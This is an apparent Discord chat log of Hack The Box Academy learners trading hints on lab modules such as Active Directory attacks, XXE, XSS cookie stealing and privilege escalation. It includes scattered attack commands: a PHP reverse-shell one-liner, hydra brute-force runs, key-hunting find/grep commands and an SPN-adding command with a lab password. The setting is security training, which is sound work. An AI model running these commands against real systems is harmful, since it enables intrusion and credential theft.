
thorn urchin
#

with a module surely

limber veldt
#

Can yall teach me how to hack a discord servee

thorn urchin
#

no

#

and actually read it

#

this channel is for module discussion for HTB Academy

limber veldt
#

I just wanted payback

#

Sorry for disturbing yall

thorn urchin
#

Do I look like I care?

#

read the rules

#

This whole server isnt for that kind of stuff anyways. So piss off

analog dock
#

Finally πŸ’€πŸ˜«

blazing light
#

On the Upload skill assessment, did you have to figure out how to make the broken upload feature to work?

#

In my assessment, there is nothing happening after clicking on submit.

heady tusk
#

umm can you give me a screenshot of what you mean?

blazing light
#

ok can i dm?

heady tusk
#

sure

blazing light
#

thanks

small sage
#

hello, stuck on AD Enumeration & Attacks -Skills Assessment Part 2
question: Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
been hunting for a while and don't seem to be getting anywhere, any hints/nudges?

heady tusk
small sage
heady tusk
#

||password spraying|| seems like a good idea

small sage
limber river
blazing light
heady tusk
full star
#

Hey. I'm just getting started and am in the HTTP Fundamentals module, and I have the following "question":
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

I've found the request, but I don't know what header info the question is looking for. I've tried filename, initiator, method.

heady tusk
#

A flag usually has the format HTB{random_stuff_here}

full star
#

I see. Thank you.

opal storm
#

hello, for active directory enumeration and attacks skills assessment 2 - im struggling with the first question with finding a hash for a user. ive tried some techniques covered in the beginning of the module but had no luck. any tips?

opal storm
thorn urchin
#

either way, its always worth trying everything that could be relevant. HTB loves to throw that one small paragraph where it offhand mentions something you can try at ya

#

that said for assessment 2 its not one of those, its one of the basic obvious things you should try first kind of stuff

opal storm
#

so the first question wants us to find a hash for a user so that narrows down some of the techniques to try, at least in my eyes and i cant think of anything else i didnt try. unless i did something wrong

low vine
#

CBBH made me realize my note taking is bad and I need to visually map out everything. I 100% am doing this with CPTS material

#

its taking me way longer but hopefully stops me from making those misses like @thorn urchin is talking about

blazing light
small sage
onyx rapids
#

BLIND SQL INJECTION - Skills Assessment : Anyone able to give me a hint to find the injection point? I tried sqlmap using the most aggressive settings, on everything, including the cookies and user agent.

Ok, so sqlmap is a bit strange. I had to force it to --dbms "Microsoft SQL Server"

blazing light
#

Unrestricted File Upload Skill Assessment:
I have successfully bypassed the filters, the next challenge is to read upload.php. I have tried xxe via svg, but the only thing that I receive back is the base64 encoded payload that we sent.
Can someone give me a hint on what to do here?

I have already tried the xxe payload with php filters.

lavish needle
#

Currently stuck on the Broken Authentication module - Weak Bruteforce Protections section - on question 2. I've tried using the X-Forwarded-For header and inserting the ||target's ip, server name, and the php/x.x.xx|| but with 0 luck. Used Burp, curl, and even hydra. Any help would be appreciated!

low vine
timber ore
misty current
lavish needle
#

@low vine fs lmk

misty current
#

Assuming, you've tried that too. I think I might have a clue where you might have gone wrong in that but, yeah

low vine
#

@lavish needle I reformatted all my notes dont have individual questions / methodologies in here anymore 😦

lavish needle
#

@low vine haha no worries bro thx anyways!

analog dock
#

😰

analog dock
#

Mounting that share took me longer than all of the moduleπŸ˜‚

#

That’s what I ended up doing as well

#

Have a NUC at home i rdp into

#

Made a kali vm and used a shared folder

timber ore
#

I'd like to give a big shoutout to @acoustic owl . He is truly outstanding - incredibly helpful and incredibly kind. He is very helpful and I am grateful for his help.

wild dragon
#

@acoustic owl , he is a great big bro!

round gale
#

hello, in the linux privilege escalation room, cron job abuse room, i found the file which can be edited and runs a cronjob. but where do i find, how that particular cronjob is scheduled?

#

oh i got it, thanks

wild dragon
#

@round gale here you are

round gale
wild dragon
slim pelican
#

any further tips on this? Tried running it prior to setting breakpoint and still get the same errors you posted above.

rustic sage
#

Hello im in module Paswords attacks lab-medium i have 2 users ja---- and de--- but i cannot do the privesc somebody can help me?

rustic sage
#

somebody can help with passwords attacks lab-medium please?

acoustic owl
rustic sage
#

i have 2 users

#

jaxxx and dexxx

acoustic owl
#

use the User dexxx

rustic sage
#

i use it

#

but i dont know how to do trhe privesc

acoustic owl
#

You need to find a file

#

This file is the "keyβ€œ

heady tusk
opal storm
misty current
rustic sage
#

i dont know what file i have to found

#

Anyone could help me
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. Performed dig on all subdomains (dig any @white rock subdomains) ,Used subbrute on inlanefreight.htb and Whenever I try to do a AXFR transfer it fails. Tried adding subdomains to my hosts file as well but still doesnt work

heady tusk
rustic sage
#

a password an id_rsa

heady tusk
acoustic owl
heady tusk
#

And where did your zone transfer fail?

rustic sage
#

; <<>> DiG 9.18.12-1-Debian <<>> axfr inlanefreight.htb @10.129.203.6
;; global options: +cmd
; Transfer failed.```
acoustic owl
heady tusk
acoustic owl
rustic sage
#

i search this grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" and this find / -name *id_rsa* 2>/dev/null but only is the id_rsa of dexxx user

heady tusk
acoustic owl
acoustic owl
heady tusk
#

Fair

acoustic owl
#

Private keys in the .ssh directory are usually used to log in as another user somewhere. Right?

sacred ermine
#

did smn complete documentation & Reporting skills assessment??

acoustic owl
rustic sage
sacred ermine
#

this must be smth medium considering skills assessment, it is not easy tho

acoustic owl
sacred ermine
rustic sage
#

how do you see how many users have a badge?

low vine
#

Broken Auth in CBBH path made me want to cry

west night
sacred ermine
heady tusk
acoustic owl
sacred ermine
acoustic owl
low vine
#

Whats the total on CPTS passes so far is it still under 100?

sacred ermine
#

is there any source to check it?

low vine
#

I gotta get the CPTS next, feel very behind on AD / my AD abilities

acoustic owl
heady tusk
#

πŸ˜„

low vine
#

I shed tears it took me like 4 days of throwing a tantrum

sacred ermine
# acoustic owl

can you give a hint on skills assessment pls, Documentation & Reporting three dayys straight in a row, and not anything out of it

rustic sage
low vine
#

I was trying to find it i only see the cert

acoustic owl
sacred ermine
acoustic owl
low vine
#

^ i'm looking now wheree do you find that one?

acoustic owl
low vine
#

weird thats exactly what im looking at lol

autumn pilot
#

not quite, click on "Get a shareable link" below the buttons

low vine
#

solid thanks

autumn pilot
#

157

low vine
#

I was like wtf am i missing lol

#

Damn I was 142 about a month ago

acoustic owl
low vine
#

Well when I walk back through that modules and relive that pain I'll come here

#

but for now.......we not back on it yet

heady tusk
#

Do we get a live ticker then? πŸ˜›

acoustic owl
heady tusk
#

nah I meant for when Roll For Combat relives his pain

#

I know that it doesn't update that often

low vine
#

Ill have to look at CPTS path hold up

#

cause i feel like ive lost it all lol I'd say 1.5 months

sacred ermine
acoustic owl
dapper star
#

Can someone help me with:

  • Web Attacks: Blind Data Exfiltration (XXE)

I currently have this, but it is not giving me any response...

summer lava
acoustic owl
#

Oh, Simple was faster

dapper star
#

The php they provide in the section

autumn pilot
#

is your php server started in the same directory as the xxe.dtd file, and does it include the index.php

pulsar needle
#

Does anybody have a recommended resource to keep learning about Active Directory after doing the "Introduction to Active Directory" module?
That module left me with more questions than answers

thorny garden
#

I am on the getting started module trying to run an nmap scan on the web server in the Public Exploits section. It comes back saying the host is down. Is this correct??

acoustic owl
# pulsar needle Does anybody have a recommended resource to keep learning about Active Directory...

Want to learn all about #AD? This guide will help you go from zero to hero! 🦸
βœ… #HTBAcademy to introduce you to #ActiveDirectory principles
βœ… #HTB Machines for some hands-on practice
βœ… Offshore #ProLab simulating real-world corporate scenarios
#CyberSecurity #Hacking

Likes

153

narrow solar
#

good morning friends 😊 at Password Attacks Lab - Medium can i get a hint how to interact with the service on the host, since the port is closed i cant use hydra and i dont think i can use http://localhost:####/

narrow solar
#

i tried that πŸ˜… let me check again

autumn pilot
#

i can't recall a step that has http in it for that lab

acoustic owl
narrow solar
narrow solar
autumn pilot
#

if the port is not up, then you are looking at the wrong thing

#

there is something that stands out and can be used

narrow solar
#

its not working πŸ˜… i am already at j****** user, i searched for everything, history, conf files, scripts and nothing there, so i am almost sure its something else in the document, but the service mentioned there is not running

acoustic owl
narrow solar
#

i already did it but was using uppercase 🀦 its always the simple mistakes

#

thank you so much πŸ₯°

quick cloud
#

question before I dive into the rabbit hole do I need to get a windows virtual machine to mount the drive on password attacks - hard

#

nvm found info

gaunt monolith
#

Hi I’m a student in HTB academy Im wondering If it’s important to subscribe in HTB lab or machines to Improve my skills when finished module or waiting when finish cpts path ?

thorny garden
#

Ger the subscription once you have got to the 'nibbles' part of the second module

gaunt monolith
quick cloud
#

password attacks - hard down was a great machine did not enjoy the curve ball I got thrown at the end though haha

modern falcon
#

Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: RDP and SOCKS Tunneling with SocksOverRDP
https://academy.hackthebox.com/module/158/section/1439
I have been able to set up port forwarding from the attacker host to the pivot host then to victor's host, but when I tried to connect to jason's host the connection always reset. The hint says that jason is a local user and there might be a defender. Any hint to bypass the defender?

silent beacon
#

Would someone be able to provide me a sanity check or a nudge for: Web-Attacks, Blind Data Exfiltration? I'm able to get the server to request the DTD I'm hosting, however, I can never get the flag contents. I've also tried to get the contents from /etc/passwd, but can't get that to dump either. I've cross checked what I'm doing with portswigger and a few other write-ups on OOB-XXE and I'm not sure what I'm doing wrong at this point

vital adder
vital adder
vital adder
surreal beacon
#

floofd?

tawny zealot
#

yes?

surreal beacon
#

can u help ?

tawny zealot
#

uhhh, I was just about to ask for help myself (session hijacking chapter in the xss module, the server connects but the cookie it submits is always empty), what is the problem?

tawny zealot
#

When I click on the link myself I do indeed get a cookie in the ouput of the PHP server, just that its my own cookie

heady tusk
heady tusk
tawny zealot
#

||10.129.59.218:48226 [200]: GET /index.php?c=
||

#

that is what I get when the Server "clicks" on the link

#

||10.10.14.170:48328 [200]: GET /index.php?c=abcPHPSESSID=ipobk3ea8mt9hmm05jp3f||

and that is what it looks like when I do it

#

the 'abc' in the front is just because i wanted to see if it would show anything at all, thats why I added it in the script.js

heady tusk
#

so you're hosting some kind of cookie stealer and it does load it but something breaks?

surreal beacon
#

ftp?

#

i logged in ftp

#

but what next

#

like put the public key inside?

tawny zealot
tawny zealot
tawny zealot
# surreal beacon ftp?

I don't know the module out of the top of my head, but is there a ssh private key somewhere on the ftp server maybe?

heady tusk
surreal beacon
#

i tried to find it but nope nothing

#

@heady tusk if u have finished it please give me tips

#

i hate being stuck in a module

heady tusk
heady tusk
tawny zealot
heady tusk
#

hmm then give me some more detailed steps of what you did, which payloads you used, etc. Maybe I can spot something

west night
#

Hi @acoustic owl . I am on the medium lab in the footprinting module. I successfully found the credentials in the NFS share, In addition was able to login to the RDP server. However I am unsure what to do next. I tried to use the details to log into the email server but connection was refused. I tried to log into the sql server on the rdp but this was not successful. In addition, I tried to login remotely (see terminal) but this was also unsuccessful. It seems like I have gone down a rabbit hole. Would you be able to guide me in the right direction or give me a hint? Thanks.

sacred ermine
#

has anyone done Attacking Thick Client Applications?? I got big trouble with it I cannot catch a process with procmon, so basically at the beginning of it, how did you guys manage to complete it that's mad

surreal beacon
#

@heady tusk

#

could u help me?

heady tusk
heady tusk
sacred ermine
#

has anyone done Attacking Thick Client Applications?? I got big trouble with it I cannot catch a process with procmon, so basically at the beginning of it, how did you guys manage to complete it that's mad

#

did you complete this? I am stuck at the beginning

subtle glen
#

attacking common services easy lab.
with an nmap scan i found there is an ftp server up, medusa is extremely slow and hydra completely breaks if i try to use it with more than 1 thread so i cannot attack the ftp server, i specifically get this error code: ||[ERROR] Not an FTP protocol or service shutdown: 550 Too many connections, please try later...||
there is an smtp server too, i tried smtp-usr-enum and found a user named ||fiona|| with their email, i tried brute forcing their password this this command: ||hydra -l fiona -P Downloads/pws.list -f 10.129.52.79 pop3|| after a few seconds it gets stuck here: || [DATA] attacking pop3://10.129.52.79:110/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
C

there is an sql db too but its completely useless to me without creds.
may i please have some help?

heady tusk
sacred ermine
#

I hate Attacking Thick Client Applications, it doesnt work fvck

misty current
#

Where are you stuck?

subtle glen
sacred ermine
misty current
#

use filters to get what you want on procmon

heady tusk
fossil tendon
#

Question does your rank or level automatically update when you rank up on the website. Wasn’t sure where to ask this question

subtle glen
sacred ermine
#

how that filter is used

tawny zealot
sacred ermine
#

like man there is no description how to use that how am I supposed to get it

heady tusk
tender acorn
#

I'am at Module Getting Started at Knowles check.

I have the user Flag. the root is left.
I know Bocuse sudo -l ||(ALL : ALL) NOPASSWD: /usr/bin/php||

I try to add the ||/usr/bin/php a shell|| it dont work.
Is this the right way?
becouse i dont find a kernal exploit and i dont think they try to hide sume exploit in a programm.

what other whay give it? How i can exploit ||/usr/bin/php||? i dont finding from google

misty current
sacred ermine
misty current
#

Give it a few try and if you still can't find it, you can DM

zinc marsh
#

what is his doubt

tender acorn
#

i try it

zinc marsh
sacred ermine
#

and on top of it I keep getting this error: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
'c:\programdata\restart-service.exe' is not recognized as an internal or external command,
operable program or batch file.
Could Not Find c:\programdata\restart-service.exe

#

like bro, u better kill me...

#

5-6 time I am resetting the instance

tender acorn
#

but i try ||php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'|| and get only a normal user shell not a root

tender acorn
#

i find out || (ALL : ALL) NOPASSWD: /usr/bin/php|| when i understand right i can do manipulate this to give me root rights or i am wrong

zinc marsh
tender acorn
#

but it givs reverse shell whit root rights?

sacred ermine
#

I did get it guys

#

what I was doing before was right, but I got this error multiple times: c:\programdata\restart-service.exe' is not recognized as an internal or external command

sacred ermine
#

I set right paramaters for the procmon, so I now can see where .bat file is being saved, but I am getting this stuff c:\programdata\restart-service.exe' is not recognized as an internal or external command

sacred ermine
#

check my msgs pls

zinc marsh
sacred ermine
#

how did you solve it bro

acoustic ibex
#

I have a question about 'Pivoting, Tunneling, And Port Forwarding' module
Section 'Dynamic Port Forwarding with SSH and SOCKS Tunneling'

Dynamic forwarding through SSH, in the SSH command it was shown:

Konafa@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64

And in proxychains.conf they added the entry:

Konafa@htb[/htb]$ tail -4 /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4     127.0.0.1 9050

Isn't it supposed to be socks4 <victim_IP> 9050 not 127.0.0.1?

proud pine
#

This is actually a benefit, since no additional ports need to be opened on the victim.

acoustic ibex
#

I see, thank you so much

sacred ermine
tender acorn
zinc marsh
foggy light
#

Module: Kerberos Attacks
Section: Unconstrained Delegation - Users

not sure what Im doing wrong

I have added spn using this for user callum.dixon
python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

Now how am i suppose to receive the tgt?
I dont have hash for compromise target. I have only the password, I tried with that but I didnt receive any TGT

sacred ermine
#

guys

#

Pls help me like what is this

#

I cannot move on

#

I stuck for a few days here

kind turret
foggy light
#

getting this error with secrets dump

kind turret
#

DM me.

clever sky
#

Hello everyone! I need some help... I am stuck on the session: Value Fuzzing of the ATTACKING WEB APPLICATIONS WITH FFUF module. I am getting the same results for all 1,000 IDs:
[Status: 403, Size: 334030, Words: 114, Lines: 113, Duration: 29ms]
Can someone assist?

acoustic owl
zinc marsh
zinc marsh
sacred ermine
# zinc marsh .

ok, now you r claimining that I somehow offended you, I just did simple compliment bro

zinc marsh
zinc marsh
clever sky
zinc marsh
#

but if u dont respect a guy which is helping u why should i help u

sacred ermine
thorn urchin
#

being a dick is a terrible way to get help

clever sky
zinc marsh
thorn urchin
#

good luck figuring things out on your own

clever sky
clever sky
#

I have tried with teh -fs and without

zinc marsh
#

or ms or whatever filter u have found

#

that might be useful

clever sky
#

they are all the same results

zinc marsh
#

i thing that one was with -ms but not sure rn

clever sky
#

[Status: 403, Size: 334030, Words: 114, Lines: 113, Duration: 24ms]

sacred ermine
#

but I keep getting that error, it is not happening because of it, why r u playing "so smart" yet you aint read the msgs

#

anyway thanks

misty current
#

I feel like admin/admin.php?id=n is authenticated? then you'd need to provide the session cookies

clever sky
#

It doesn't mention anything about authentication in the module

misty current
#

Did you authenticate tho?

clever sky
#

No... how?

rustic sage
#

Hello colleagues, I am finishing the safety fundamentals course. Do I want to know how I can start practicing in the labs according to what I learned?

misty current
#

Ah, if it's not authenticated then it's something else lol.

#

It looked like a request that you fetched after you logged into the application. Not the case I see

zinc marsh
clever sky
# zinc marsh send what output u get

I tried the same command on HTB Pwnbox and worked. For some reason is not working on the Parrot HTB VM I usually use. The VPN is setup correctly and working.

#

Thanks

zinc marsh
#

someone completed this? not sure if i used the intended way

onyx rapids
#

This here is really confusing, it comes from the NoSQL module. Why all of a sudden can we name a parameter that way? I really wish there was more details around that because I've never seen anything like that before. Usually payloads go inside the value of the parameter, and so I'm not even sure how the parameter name itself can be tampered with and still work

thorn urchin
onyx rapids
thorn urchin
#

its all strings in the end and how they get parsed

onyx rapids
# zinc marsh not equal

The not equal part makes sense, but the fact that it's not in the value, but within the parameter name itself confuses me

zinc marsh
thorn urchin
#

theres nothing special that makes a parameter name different than the value other than how the backend processes it